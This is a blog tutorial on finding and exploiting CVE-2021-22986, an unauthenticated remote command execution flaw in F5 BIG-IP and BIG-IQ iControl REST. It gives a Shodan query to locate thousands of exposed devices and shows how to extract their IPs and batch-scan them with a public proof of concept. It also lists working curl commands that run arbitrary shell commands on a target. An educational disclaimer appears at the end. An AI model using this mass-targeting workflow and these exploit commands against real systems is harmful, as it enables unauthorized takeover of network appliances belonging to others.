Finding and exploiting iControl REST unauthenticated RCE[ CVE-2021–22986 ]

In march 10 , F5 released and advisory about the Unauthenticated rce on icontrol . On their report they described that any unauthenticated users can execute arbitrary system commands, create or delete files, or disable services.

Vulnerable/affected versions are:

  • F5 BIG-IQ 6.0.0–6.1.0
  • F5 BIG-IQ 7.0.0–7.0.0.1
  • F5 BIG-IQ 7.1.0–7.1.0.2
  • F5 BIG-IP 12.1.0–12.1.5.2
  • F5 BIG-IP 13.1.0–13.1.3.5
  • F5 BIG-IP 14.1.0–14.1.3.1
  • F5 BIG-IP 15.1.0–15.1.2
  • F5 BIG-IP 16.0.0–16.0.1

There are no specific way to directly found the vulnerable device or network, we are gonna use simple Big-Ip detection method to to find systems potentially impacted by CVE-2021–22986.

Or We can use the IOC [Indicators of Compromise ] to detect potentially vulnerable devices. F5 Described on their article affected device will contain this text on /var/log/restjavad*.log.

"X-F5-Auth-Token doesn’t have value"

We can use Shodan to find potentially vulnerable devices . We can use the same filter we use to detect big ip devices on shodan.

http.title:"BIG-IP®-Redirect"

shodan shows 10,910 devices , not all of them are vulnerable we are gonna detect and exploit the vulnerability using a simple proof of concept written by Al1ex. The Poc contains chinese word here is the translated version. We can either download all the result or use shodan cli to scan for this cve. First lets start with the downloaded shodan result.

We can download the result by using download result button.after downloading the result and the poc. Lets start detecting the vulnerability using this poc. by typing python3 CVE_2021_22986.py -h we can see the help menu.

We can see on the help menu their is option described as batch detection

python3 CVE_2021_22986.py  -s true -f filename

first lets filter ip from the result we have downloaded from shodan,we can do that by using grep and regex on our linux shell.

cat shodan_file | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

so lets save the output to a file , now its time to start the scan.

after detecting you can use poc.py to execute command on the target system without writing the full exploit command again and again.

You can exploit this vulnerability manually using these steps.

Step-1: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-2: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-3: curl -su admin: -H “Content-Type: application/json” http://[target-ip]:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c [command-to-execute]”}’

Using automated exploit is much fast for detection and exploiting , manual exploition is slow , it will take more time to test a list.

You can use this to find P1 on your bugbounty program if any of their big ip product is vulnerable with the same vulnerability.

Nuclei Detection Script: CVE-2021–22986.yaml

[ Declaimer: the ip i have tested and exploited was my own local docker ip , please do not exploit or test others ip without permission.This article is Educational purposes only. ]

--

--

--

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Security in Software Development and Infrastructure System Design

Coming in Hot, Our latest Airdrop 🪂

{UPDATE} Nombres de Frutas y Bayas Hack Free Resources Generator

Secure Mobile Applications Against Cyber Security Vulnerabilities

Remediation, wherefore art thou?

What you should know before you Pick Secure Code Review services

Exploit Whatsapp using QRljacker!

The Monthly Transmission 7/01/2022

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

More from Medium

Exploiting CVE-2019–5418- File Content Disclosure on Rails

DiceCTF 2022 — write-up

Lab: Username enumeration via subtly different responses

BugBounty: Algolia key disclosure vulnerability